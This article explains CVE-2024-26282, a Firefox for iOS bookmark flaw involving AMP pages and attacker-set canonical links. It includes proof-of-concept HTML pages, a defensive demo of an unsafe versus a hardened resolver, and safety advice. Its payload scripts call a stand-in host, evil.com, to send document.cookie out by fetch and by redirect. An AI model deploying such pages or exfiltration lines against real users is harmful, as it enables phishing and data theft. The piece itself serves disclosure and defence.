In early 2024, a security vulnerability was disclosed in Firefox for iOS (versions before 123) that could let an attacker run JavaScript of their choosing through a combination of Accelerated Mobile Pages (AMP) URLs and canonical link elements. Tracked as CVE-2024-26282, the bug affected users who bookmarked a crafted page and later reopened the bookmark, which could lead to unexpected code execution. This article breaks down how the exploit works, shows code examples, and gives practical advice on staying safe.
Background
- AMP (Accelerated Mobile Pages): an open-source project started by Google to speed up mobile web pages. Pages served from Google's AMP cache have URLs that look like https://www.google.com/amp/s/[site]/..., where the s/ segment means the original site was fetched over HTTPS.
- Canonical link element: an HTML tag (<link rel="canonical" href="...">) that tells search engines which URL is the "official" or original version of a page. Its value is ordinary page content, so whoever controls the page controls it.
If an attacker controls the canonical link of a page, they can craft a scenario where a user bookmarks that page and, on reopening the bookmark, the browser navigates to a page the user never chose and runs its JavaScript, even though that destination came from an untrusted source.
The Core of the Vulnerability
When a user visited an AMP page and bookmarked it, Firefox for iOS stored the AMP URL but resolved the page's canonical URL and treated that as the bookmark's real destination. Because the canonical href is just markup in the page, an attacker who controls the AMP page also controls where the bookmark points: the canonical link can reference any page the attacker hosts.
When the user opens the bookmark:
Firefox for iOS loads the canonical page (the attacker's site) rather than the page the user saved, and that page runs whatever JavaScript the attacker put there.
Suppose an attacker controls evil.com and creates a malicious AMP page:
```html
<!DOCTYPE html>
<html amp>
<head>
<meta charset="utf-8">
<title>Malicious AMP Page</title>
<!-- The canonical link is attacker-controlled; this is what the bookmark resolves to -->
<link rel="canonical" href="https://evil.com/payload.html">
<script async src="https://cdn.ampproject.org/v0.js"></script>
</head>
<body>
<p>This is a harmless looking page. Bookmark me!</p>
</body>
</html>
```
And on https://evil.com/payload.html:
```html
<!DOCTYPE html>
<html>
<head>
<title>Payload</title>
<script>
// Malicious code: exfiltrate cookies (this script runs in evil.com's origin,
// so document.cookie here is evil.com's own cookie jar) and announce itself
fetch('https://evil.com/steal?cookie=' + document.cookie);
alert('Your info has been stolen!');
</script>
</head>
<body>
<h1>Oops!</h1>
</body>
</html>
```
- The user visits the AMP page via Google Search or a direct link (the URL resembles https://www.google.com/amp/s/evil.com/page1.html).
- The user bookmarks this page in Firefox for iOS.
- When the bookmark is reopened, the bug makes the browser load the canonical page (payload.html on evil.com) instead of the page the user saved, and the attacker's JavaScript runs there.
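To make the failure concrete, here is a small model of how a bookmark target can be derived from page content. It is an added example written for this article, not Firefox's code, and it does not reproduce Mozilla's fix. The unsafe resolver does what the article describes: it trusts the page's canonical link. The hardened resolver keeps the URL the user actually visited unless the canonical link parses, is http(s), and stays on an origin the user really visited (the AMP cache page's own origin, or the publisher origin embedded in a Google AMP cache URL). The sample HTML, the URLs (news.example, evil.com) and that origin policy are assumptions constructed for the demo.

```javascript
// Added example for this article (not Firefox's code, and not Mozilla's fix):
// a model of deriving a bookmark target from page content. The unsafe resolver
// trusts the page's canonical link, as the article describes; the hardened one
// keeps the URL the user visited unless the canonical link is http(s) and stays
// on an origin the user actually visited. The HTML, URLs and origin policy are
// constructed assumptions for the demo.

// Constructed sample page: the only part that varies is the canonical href.
function pageWithCanonical(href) {
  return `<!DOCTYPE html>
<html amp>
<head>
<meta charset="utf-8">
<link rel="canonical" href="${href}">
<script async src="https://cdn.ampproject.org/v0.js"></script>
</head>
<body><p>Bookmark me!</p></body>
</html>`;
}

// Pull the canonical href out of the markup. A real browser reads the DOM;
// a tolerant regex is enough to keep this demo dependency-free.
function extractCanonical(html) {
  const m =
    html.match(/<link\b[^>]*rel=["']canonical["'][^>]*href=["']([^"']+)["']/i) ||
    html.match(/<link\b[^>]*href=["']([^"']+)["'][^>]*rel=["']canonical["']/i);
  return m ? m[1] : null;
}

// Google AMP cache URLs (https://www.google.com/amp/s/<host>/<path>) embed the
// publisher's host; "s/" marks an HTTPS origin. Recover the publisher URL.
function ampCacheToPublisherUrl(urlStr) {
  const u = new URL(urlStr);
  const m = u.pathname.match(/^\/amp\/(s\/)?([^/]+)(\/.*)?$/);
  if (u.hostname !== 'www.google.com' || !m) return null;
  return `${m[1] ? 'https' : 'http'}://${m[2]}${m[3] || ''}`;
}

// UNSAFE: the bookmark destination is whatever the page's canonical link says,
// so the page, not the user, chooses where the bookmark navigates later.
function bookmarkTargetUnsafe(visitedUrl, html) {
  const canonical = extractCanonical(html);
  return canonical ? new URL(canonical, visitedUrl).href : visitedUrl;
}

// HARDENED: default to the URL the user actually visited. Accept a canonical
// rewrite only when it parses, is http(s) (rejecting javascript:, data:, ...)
// and stays on the visited origin or the publisher origin embedded in an AMP
// cache URL. This policy is an assumption of the example.
function bookmarkTargetHardened(visitedUrl, html) {
  const visited = new URL(visitedUrl);
  const trustedOrigins = new Set([visited.origin]);
  const publisher = ampCacheToPublisherUrl(visitedUrl);
  if (publisher) trustedOrigins.add(new URL(publisher).origin);

  const canonical = extractCanonical(html);
  if (!canonical) return visitedUrl;
  let target;
  try {
    target = new URL(canonical, visitedUrl);
  } catch {
    return visitedUrl;
  }
  if (target.protocol !== 'https:' && target.protocol !== 'http:') return visitedUrl;
  if (!trustedOrigins.has(target.origin)) return visitedUrl;
  return target.href;
}

// Stand-alone demo: a news page on the AMP cache whose canonical link was
// pointed at evil.com (constructed URLs).
const visited = 'https://www.google.com/amp/s/news.example/story.amp.html';
const hostile = pageWithCanonical('https://evil.com/payload.html');
console.log('unsafe   ->', bookmarkTargetUnsafe(visited, hostile));
console.log('hardened ->', bookmarkTargetHardened(visited, hostile));
```

Run with `node` to see the unsafe resolver hand the bookmark to evil.com while the hardened one keeps the Google AMP cache URL the user saw. The scheme check is the cheapest of the two guards: it also stops a canonical href such as javascript:... from ever becoming a bookmark target, whatever origin policy you settle on.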
Why is This Dangerous?
- Bookmark trust: users trust their bookmarks, so a bookmark saved from an innocuous-looking AMP page can later open a page the user never chose, and it was the page, not the user, that picked that destination.
- Bypassing filters: AMP URLs under www.google.com look legitimate, so users and simple URL-based filters may not realize the saved bookmark leads to an attacker's site.
- Origin caveat: the payload runs in its own origin. In the example above, document.cookie inside payload.html returns evil.com's cookies, not those of any other site, so the direct impact is a trusted bookmark silently navigating to attacker-chosen content (phishing or whatever else the attacker serves), not cross-site cookie theft.
The same attack again, broken into the two steps the attacker takes.
Step 1: The attacker gets the user to bookmark the AMP page
```html
<!-- https://amp.evil.com/bookmarkme.html -->
<html amp>
<head>
<meta charset="utf-8">
<title>Hey, Save Me!</title>
<!-- The bookmark will resolve to this canonical URL, not to bookmarkme.html -->
<link rel="canonical" href="https://evil.com/trigger.html">
<script async src="https://cdn.ampproject.org/v0.js"></script>
</head>
<body>
<h1>Add this page to your bookmarks for free stuff!</h1>
</body>
</html>
```
Step 2: The canonical URL points to a payload
```html
<!-- https://evil.com/trigger.html -->
<html>
<head>
<title>Attack!</title>
<script>
// Anything here runs when the user opens the bookmark
window.location = "https://evil.com/phishing?data=" + btoa(document.cookie);
</script>
</head>
<body>
<p>Redirecting you...</p>
</body>
</html>
```
Affected: Firefox for iOS versions before 123
- Not affected: Firefox for Android, desktop Firefox, and other browsers. Firefox for iOS is a separate WebKit-based codebase, so the bookmark bug does not exist elsewhere. Keep every browser updated regardless.
Be careful of canonical manipulation: avoid bookmarking AMP pages from sites you do not trust, and if a bookmark opens something other than the page you saved, delete it rather than interacting with it.
## More Information / Official References
- Mozilla Advisory: MFSA 2024-17: Security Vulnerabilities fixed in Firefox for iOS 123
- Original Bug Report: Bugzilla Mozilla Bug 188137 *(may require login)*
- CVE Entry:
- AMP Project:
Conclusion
CVE-2024-26282 is a clear example of how combining ordinary web features (AMP and canonical links) can produce unexpected browser behaviour that becomes a security risk: a value the page controls ended up deciding where a trusted bookmark navigates. Users who keep Firefox for iOS updated and stay cautious when bookmarking unfamiliar AMP pages are protected.
Stay safe and always update your browser!
Timeline
Published on: 02/22/2024 15:15:08 UTC
Last modified on: 11/06/2024 23:35:00 UTC